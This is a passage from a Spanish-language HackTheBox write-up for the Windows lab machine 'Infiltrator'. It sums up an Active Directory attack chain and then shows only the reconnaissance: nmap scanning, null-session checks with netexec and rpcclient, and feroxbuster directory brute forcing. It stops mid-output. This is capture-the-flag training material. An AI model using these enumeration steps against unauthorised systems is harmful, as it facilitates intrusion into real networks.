C# on sckull https://sckull.github.io/tags/c%23/ Recent content in C# on sckull Hugo -- gohugo.io es ©{year}, All Rights Reserved Sat, 14 Jun 2025 00:00:00 +0000 daily daily HackTheBox - Infiltrator https://sckull.github.io/posts/infiltrator/ Sat, 14 Jun 2025 00:00:00 +0000 Sat, 14 Jun 2025 00:00:00 +0000 https://sckull.github.io/posts/infiltrator/ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/infiltrator/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>Infiltrator inicia con la enumeracion de usuarios y con la ejecucion de AS-REP Roasting para acceso inicial. Con la ejecucion de Bloodhound y analisis se realizo la explotacion de permisos en Active Directory a traves de diferentes usuarios. Se descubre Output Messenger en ejecucion donde se logro el acceso a varios usuarios, uno de estos tiene una sesion abierta, a traves de eventos de calendario se obtuvo acceso a un nuevo usuario. Un archivo backup contiene clave de recuperacion para Bitlocker, tras el uso de esta se encontro un backup de la base de datos NTDS. Esta ultima permitio el acceso a un usuario con el cual logramos escalar privilegios con la explotacion de ESC4.</p> <![CDATA[ <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/infiltrator/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>Infiltrator inicia con la enumeracion de usuarios y con la ejecucion de AS-REP Roasting para acceso inicial. Con la ejecucion de Bloodhound y analisis se realizo la explotacion de permisos en Active Directory a traves de diferentes usuarios. Se descubre Output Messenger en ejecucion donde se logro el acceso a varios usuarios, uno de estos tiene una sesion abierta, a traves de eventos de calendario se obtuvo acceso a un nuevo usuario. Un archivo backup contiene clave de recuperacion para Bitlocker, tras el uso de esta se encontro un backup de la base de datos NTDS. Esta ultima permitio el acceso a un usuario con el cual logramos escalar privilegios con la explotacion de ESC4.</p> <table> <thead> <tr> <th>Nombre</th> <th style="text-align: center"><a href="https://app.hackthebox.com/machines/623">Infiltrator</a> <img src="#ZgotmplZ" alt="box_img_maker"></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td style="text-align: center"><span><p class="os_type"> Windows <img src="https://sckull.github.io/images/icons/windows.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td style="text-align: center">50</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td style="text-align: center">Insane</td> </tr> <tr> <td><strong>Fecha de Salida</strong></td> <td style="text-align: center">2024-08-31</td> </tr> <tr> <td><strong>IP</strong></td> <td style="text-align: center">10.10.11.31</td> </tr> <tr> <td><strong>Maker</strong></td> <td style="text-align: center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/962022">EmSec</a><img src="https://www.hackthebox.eu/badge/image/962022" class="img_user_maker"/> </p></span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Rated </span> </a></td> <td style="text-align: center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;: &#34;bar&#34;, &#34;data&#34;: { &#34;labels&#34;: [&#34;Cake&#34;, &#34;VeryEasy&#34;, &#34;Easy&#34;, &#34;TooEasy&#34;, &#34;Medium&#34;, &#34;BitHard&#34;,&#34;Hard&#34;,&#34;TooHard&#34;,&#34;ExHard&#34;,&#34;BrainFuck&#34;], &#34;datasets&#34;: [{ &#34;label&#34;: &#34;User Rated Difficulty&#34;, &#34;data&#34;: [111, 27, 90, 98, 205, 207, 472, 426, 298, 368], &#34;backgroundColor&#34;: [&#34;#9fef00&#34;,&#34;#9fef00&#34;,&#34;#9fef00&#34;, &#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;, &#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;] }] }, &#34;options&#34;: { &#34;scales&#34;: { &#34;xAxes&#34;: [{&#34;display&#34;: false}], &#34;yAxes&#34;: [{&#34;display&#34;: false}] }, &#34;legend&#34;: {&#34;labels&#34;: {&#34;fontColor&#34;: &#34;white&#34;}}, &#34;responsive&#34;: true } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra multiples puertos abiertos: http (80) y ssh (22).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.95 scan initiated Wed May 21 01:58:39 2025 as: /usr/lib/nmap/nmap --privileged -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,49668,49691,49692,49694,49727,49750,49867 -sV -sC -oN nmap_scan 10.10.11.31</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.31 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.23s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">53/tcp open domain <span class="o">(</span>generic dns response: SERVFAIL<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS-SD-TCP: </span></span><span class="line"><span class="cl"><span class="p">|</span> _services </span></span><span class="line"><span class="cl"><span class="p">|</span> _dns-sd </span></span><span class="line"><span class="cl"><span class="p">|</span> _udp </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="nb">local</span> </span></span><span class="line"><span class="cl">80/tcp open http Microsoft IIS httpd 10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Infiltrator.htb </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-05-20 23:26:58Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: infiltrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-05-20T23:30:37+00:00<span class="p">;</span> -6h31m27s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-04T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2099-07-17T18:48:15 </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: infiltrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-04T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2099-07-17T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-05-20T23:30:38+00:00<span class="p">;</span> -6h31m27s from scanner time. </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: infiltrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-05-20T23:30:37+00:00<span class="p">;</span> -6h31m27s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-04T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2099-07-17T18:48:15 </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: infiltrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-04T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2099-07-17T18:48:15 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-05-20T23:30:38+00:00<span class="p">;</span> -6h31m27s from scanner time. </span></span><span class="line"><span class="cl">3389/tcp open ms-wbt-server Microsoft Terminal Services </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-05-20T23:30:38+00:00<span class="p">;</span> -6h31m27s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc01.infiltrator.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2025-05-19T18:00:34 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2025-11-18T18:00:34 </span></span><span class="line"><span class="cl"><span class="p">|</span> rdp-ntlm-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> Target_Name: INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Domain_Name: INFILTRATOR </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Computer_Name: DC01 </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Domain_Name: infiltrator.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Computer_Name: dc01.infiltrator.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Tree_Name: infiltrator.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Product_Version: 10.0.17763 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ System_Time: 2025-05-20T23:29:52+00:00 </span></span><span class="line"><span class="cl">5985/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf .NET Message Framing </span></span><span class="line"><span class="cl">15220/tcp open unknown </span></span><span class="line"><span class="cl">49668/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49692/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49694/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49727/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49750/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49867/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl"><span class="m">1</span> service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : </span></span><span class="line"><span class="cl">SF-Port53-TCP:V<span class="o">=</span>7.95%I<span class="o">=</span>7%D<span class="o">=</span>5/21%Time<span class="o">=</span>682D6BA6%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>DNS- </span></span><span class="line"><span class="cl">SF:SD-TCP,30,<span class="s2">&#34;\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04 </span></span></span><span class="line"><span class="cl"><span class="s2">SF:_udp\x05local\0\0\x0c\0\x01&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">Service Info: Host: DC01<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: -6h31m28s, deviation: 2s, median: -6h31m27s </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-05-20T23:29:52 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Wed May 21 02:02:07 2025 -- 1 IP address (1 host up) scanned in 208.11 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><p>Agregamos a nuestro archivo <code>/etc/hosts</code> los valores <code>infiltrator.htb</code> <code>dc01.infiltrator.htb</code>.</p> <h2 id="services-access---null-sesion">Services Access - Null Sesion</h2> <p>Sesiones nulas en el servicio smb, ldap y rpc no son aceptadas.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u <span class="s1">&#39;&#39;</span> -p <span class="s1">&#39;&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\:</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>-<span class="o">]</span> Error enumerating shares: STATUS_ACCESS_DENIED </span></span><span class="line"><span class="cl">❯ netexec ldap 10.10.11.31 -u <span class="s1">&#39;&#39;</span> -p <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>-<span class="o">]</span> Error in searchRequest -&gt; operationsError: 000004DC: LdapErr: DSID-0C090C77, comment: In order to perform this operation a successful <span class="nb">bind</span> must be completed on the connection., data 0, v4563 </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\:</span> </span></span><span class="line"><span class="cl">❯ rpcclient -N -U <span class="s2">&#34;&#34;</span> 10.10.11.31 </span></span><span class="line"><span class="cl">rpcclient $&gt; enumdomusers </span></span><span class="line"><span class="cl">result was NT_STATUS_ACCESS_DENIED </span></span><span class="line"><span class="cl">rpcclient $&gt; <span class="nb">exit</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>Los headers del sitio muestra un <code>Microsoft-IIS 10</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -sI 10.10.11.31 </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Content-Length: <span class="m">31235</span> </span></span><span class="line"><span class="cl">Content-Type: text/html </span></span><span class="line"><span class="cl">Last-Modified: Mon, <span class="m">19</span> Feb <span class="m">2024</span> 00:41:24 GMT </span></span><span class="line"><span class="cl">Accept-Ranges: bytes </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;361ade5dcc62da1:0&#34;</span> </span></span><span class="line"><span class="cl">Server: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">20</span> May <span class="m">2025</span> 23:35:54 GMT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>El sitio presenta una tematica de Marketing ademas parece ser estatico, no muestra algun tipo de funcionalidad.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222271705.png" alt="image"></p> <p>Se presenta al equipo de la empresa, ocho miembros en total.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222271829.png" alt="image"></p> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <p><code>feroxbuster</code> unicamente muestra recursos estaticos del sitio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ feroxbuster -u http://infiltrator.htb/ -w <span class="nv">$MD</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher 🤓 ver: 2.11.0 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url │ http://infiltrator.htb/ </span></span><span class="line"><span class="cl"> 🚀 Threads │ <span class="m">50</span> </span></span><span class="line"><span class="cl"> 📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"> 👌 Status Codes │ All Status Codes! </span></span><span class="line"><span class="cl"> 💥 Timeout <span class="o">(</span>secs<span class="o">)</span> │ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦡 User-Agent │ feroxbuster/2.11.0 </span></span><span class="line"><span class="cl"> 💉 Config File │ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> 🔎 Extract Links │ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods │ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🔃 Recursion Depth │ <span class="m">4</span> </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menu™ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 8l 36w 1074c http://infiltrator.htb/assets/js/jquery.counterup.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 8l 165w 8051c http://infiltrator.htb/assets/js/waypoints.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 6l 69w 3660c http://infiltrator.htb/assets/images/contact-info-03.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 9l 77w 3371c http://infiltrator.htb/assets/images/contact-info-01.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 63w 2938c http://infiltrator.htb/assets/images/features-icon-1.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 186l 505w 4930c http://infiltrator.htb/assets/css/owl-carousel.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 206l 380w 4940c http://infiltrator.htb/assets/js/custom.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2l 89w 4572c http://infiltrator.htb/assets/js/scrollreveal.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 5l 69w 3366c http://infiltrator.htb/assets/images/contact-info-02.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 65w 3520c http://infiltrator.htb/assets/images/service-item-01.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 108l 545w 49592c http://infiltrator.htb/assets/images/project-item-01.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 52l 338w 26333c http://infiltrator.htb/assets/images/project-item-05.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 322l 1058w 54064c http://infiltrator.htb/assets/images/slide-03.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 90l 517w 47789c http://infiltrator.htb/assets/images/member-item-07.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 157l 862w 70811c http://infiltrator.htb/assets/images/project-item-03.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 233w 19796c http://infiltrator.htb/assets/js/imgfix.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 75l 438w 36480c http://infiltrator.htb/assets/images/project-item-02.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 203l 389w 3828c http://infiltrator.htb/assets/css/lightbox.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 70l 392w 41119c http://infiltrator.htb/assets/images/member-item-01.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 118l 603w 45109c http://infiltrator.htb/assets/images/member-item-04.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 121l 673w 45956c http://infiltrator.htb/assets/images/member-item-03.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 519l 1710w 18929c http://infiltrator.htb/assets/js/lightbox.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 139l 637w 47039c 